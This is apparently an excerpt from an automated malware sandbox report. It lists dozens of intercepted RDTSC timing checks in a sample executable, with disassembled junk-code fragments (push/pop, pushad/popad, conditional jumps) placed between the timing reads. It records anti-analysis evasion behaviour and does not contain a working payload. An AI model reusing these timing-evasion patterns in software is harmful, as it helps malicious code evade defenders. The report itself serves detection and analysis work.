                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E3345 second address: 10E3359 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E3493 second address: 10E3499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E3499 second address: 10E349E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E349E second address: 10E34D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC7h 0x00000007 pushad 0x00000008 jmp 00007FF30D194DC7h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E38A5 second address: 10E38B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E38B1 second address: 10E38BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF30D194DB6h 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E38BB second address: 10E38BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E3A37 second address: 10E3A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E3A3D second address: 10E3A4D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF30CF3CAE6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E8474 second address: 10E848F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF30D194DC2h 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E848F second address: 10E84C8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF30CF3CAE6h 0x00000008 jno 00007FF30CF3CAE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 jnp 00007FF30CF3CAE6h 0x00000017 pop esi 0x00000018 push edi 0x00000019 jno 00007FF30CF3CAE6h 0x0000001f pop edi 0x00000020 popad 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FF30CF3CAF5h 0x00000029 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E84C8 second address: 10E84CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E877A second address: 10E879A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAEEh 0x00000007 jng 00007FF30CF3CAE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007FF30CF3CAE6h 0x00000017 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E94AE second address: 10E94BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF30D194DB6h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E94BD second address: 10E94C7 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF30CF3CAE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E94C7 second address: 10E953A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FF30D194DC7h 0x0000000c jmp 00007FF30D194DC9h 0x00000011 pop ecx 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 jmp 00007FF30D194DC9h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d pushad 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FF30D194DC0h 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10F11B9 second address: 10F11BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10F11BF second address: 10F11C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10F11C4 second address: 10F11F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAF2h 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FF30CF3CAE6h 0x0000000f jmp 00007FF30CF3CAF4h 0x00000014 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10F11F4 second address: 10F11F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10F1627 second address: 10F162C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10F162C second address: 10F165E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF30D194DC2h 0x00000009 jmp 00007FF30D194DBDh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007FF30D194DB6h 0x00000017 jl 00007FF30D194DB6h 0x0000001d rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10F165E second address: 10F1662 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1060D06 second address: 1060D20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FF30D194DB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF30D194DBAh 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1060D20 second address: 1060D34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FF30CF3CAE6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1060D34 second address: 1060D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10FDAA0 second address: 10FDABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF30CF3CAF4h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10FDABD second address: 10FDAD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF30D194DC2h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10FDAD3 second address: 10FDADC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10FDADC second address: 10FDAE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10FC565 second address: 10FC57B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007FF30CF3CAECh 0x0000000e pop edi 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10FC6A4 second address: 10FC6B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10FC927 second address: 10FC95F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF30CF3CAE6h 0x0000000a jmp 00007FF30CF3CAF4h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF30CF3CAF6h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10FC95F second address: 10FC963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10FCAC3 second address: 10FCB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnp 00007FF30CF3CAE8h 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e jnp 00007FF30CF3CAE6h 0x00000014 pop ecx 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007FF30CF3CAF4h 0x0000001f push esi 0x00000020 pop esi 0x00000021 jmp 00007FF30CF3CAF0h 0x00000026 popad 0x00000027 pushad 0x00000028 push ecx 0x00000029 pop ecx 0x0000002a jmp 00007FF30CF3CAF8h 0x0000002f pushad 0x00000030 popad 0x00000031 pushad 0x00000032 popad 0x00000033 popad 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10FCB28 second address: 10FCB2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10ADCA5 second address: 10ADCA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10ADCA9 second address: 10ADCEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov di, si 0x0000000d push 00000004h 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007FF30D194DB8h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 mov ecx, 6459B5B3h 0x0000002e jns 00007FF30D194DBEh 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 push edx 0x0000003a pop edx 0x0000003b rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10ADCEF second address: 10ADCF5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10FCDFA second address: 10FCE04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF30D194DB6h 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10FCE04 second address: 10FCE1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10FCE1F second address: 10FCE25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1102A41 second address: 1102A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1101C4D second address: 1101C82 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FF30D194DC9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF30D194DC4h 0x00000012 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1101C82 second address: 1101C88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1101C88 second address: 1101CA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC6h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1101CA6 second address: 1101CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1101CAA second address: 1101CD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FF30D194DBEh 0x00000010 ja 00007FF30D194DBEh 0x00000016 jo 00007FF30D194DB6h 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1101CD4 second address: 1101CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF30CF3CAE6h 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1101E29 second address: 1101E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11020F3 second address: 11020FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11020FC second address: 1102102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1102102 second address: 1102106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1102106 second address: 1102123 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jns 00007FF30D194DC2h 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 110228A second address: 1102297 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FF30CF3CAE6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 110240B second address: 1102410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1102410 second address: 1102416 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1102416 second address: 1102429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF30D194DBFh 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1102429 second address: 110246A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FF30CF3CAF5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007FF30CF3CAFCh 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jmp 00007FF30CF3CAF4h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f push esi 0x00000020 pop esi 0x00000021 pop edi 0x00000022 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 110827E second address: 1108283 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1108283 second address: 1108289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1108289 second address: 11082A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF30D194DB6h 0x0000000a jp 00007FF30D194DB6h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jno 00007FF30D194DB6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11082A9 second address: 11082AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11082AE second address: 11082B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11082B5 second address: 11082BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11082BE second address: 11082C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11083CD second address: 11083DF instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF30CF3CAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FF30CF3CAE6h 0x00000012 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11083DF second address: 11083E5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11083E5 second address: 11083FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF30CF3CAF4h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11083FD second address: 1108403 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1108A7D second address: 1108A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1108A8B second address: 1108AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1108AA0 second address: 1108AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007FF30CF3CAF0h 0x0000000d popad 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11092F8 second address: 110930F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF30D194DC3h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1109667 second address: 110966D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 110966D second address: 1109675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 106AF99 second address: 106AF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 106AF9D second address: 106AFBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FF30D194DBFh 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007FF30D194DB6h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1112671 second address: 111267B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF30CF3CAE6h 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11127F2 second address: 1112800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF30D194DBEh 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1112BE2 second address: 1112BE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1112BE6 second address: 1112BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1112BEC second address: 1112C0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e je 00007FF30CF3CAE6h 0x00000014 pop eax 0x00000015 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1112F5A second address: 1112F5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11131C7 second address: 11131F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f ja 00007FF30CF3CAF6h 0x00000015 push edi 0x00000016 jp 00007FF30CF3CAE6h 0x0000001c pop edi 0x0000001d popad 0x0000001e pushad 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
